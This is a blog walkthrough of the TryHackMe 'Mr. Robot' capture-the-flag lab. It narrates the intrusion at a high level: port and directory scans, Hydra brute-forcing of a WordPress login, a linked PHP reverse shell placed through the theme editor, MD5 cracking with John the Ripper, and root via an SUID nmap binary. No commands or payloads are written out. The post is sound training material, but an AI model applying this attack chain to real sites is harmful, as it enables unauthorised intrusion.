Mr. Robot- TryHackMe lab

Published by Nick on

Today I am working on the Mr Robot CTF from tryhackme.com. I am using the video from DarkSec to help with parts.

I start with an nmap scan against the host to see what ports are open

I can see port 80 and 443 are open, these ports are used for http and https so I open the web browser to see what kind of site we are working with

The website is themed from the show Mr. Robot and is really cool. 

Checking the page source, you can see a cool easter egg: “You are not alone”

Checking the robots.txt page, we can find the first key and a dictionary file, I download the dictionary file.

I run gobuster to check for any other interesting pages on the web server, wp-login looks the most interesting.

wp-login leads to a WordPress login page

Next I turn on my burp proxy on the FoxyProxy plugin before opening Burp Suite

I make sure my intercept is on then go attempt to login to the WordPress site with admin, admin

This gives me the error below, this error is bed because it can be used to find a valid username

I run Hydra against the login page and come up with a username “Elliot” I tried to login with the password of test but that didn’t work

I get a new error message, this one is also a very bad practice, I can now use this error to find a valid password
Using Hydra again, I specify the username and use the dictionary file I pulled down to find the password, I find the password and log into the WordPress site.

WordPress Version 4.3.1
This user has access to the editor, I will now start a netcat listener and see if I can get a PHP reverse shell

PHP Reverse shell code: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

I edit the code and save it, then navigate to the page, when the page loads, I get the reverse shell

I find a file on the server that has the MD5 has of the password for a user account

I put the hash in John the Ripper to crack it, I get the password above

I have to upgrade to an interactive shell to login as the user

I get in and access the account of the robot user, I am still not root though
Looking for SUID binaries, I find one for nmap
I open an interactive shell and use the command from gtfobins to get root

I now have root access!

Categories: CybersecurityPentesting

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Cybersecurity

Administrator- Hackthebox lab

This lab came with Active Directory creds to simulate an assumed breach assessment. I started by checking the credentials with Netexec to confirm they worked. Next I ran Bloodhound-ce-python to collect Active Directory data for Read more

Cybersecurity

Support- Hackthebox lab

I started with an nmap scan for all TCP ports and the top UDP ports. This one looks like an Active Directory Domain Controller. Added target hostnames to /etc/hosts Looking through the SMB shares, I Read more

Cybersecurity

ServMon- Hackthebox lab

This box took a ton of troubleshooting and resets for the privilege escalation. The web server kept crashing but after many attempts, I finally got it finished. I start things off with a port scan Read more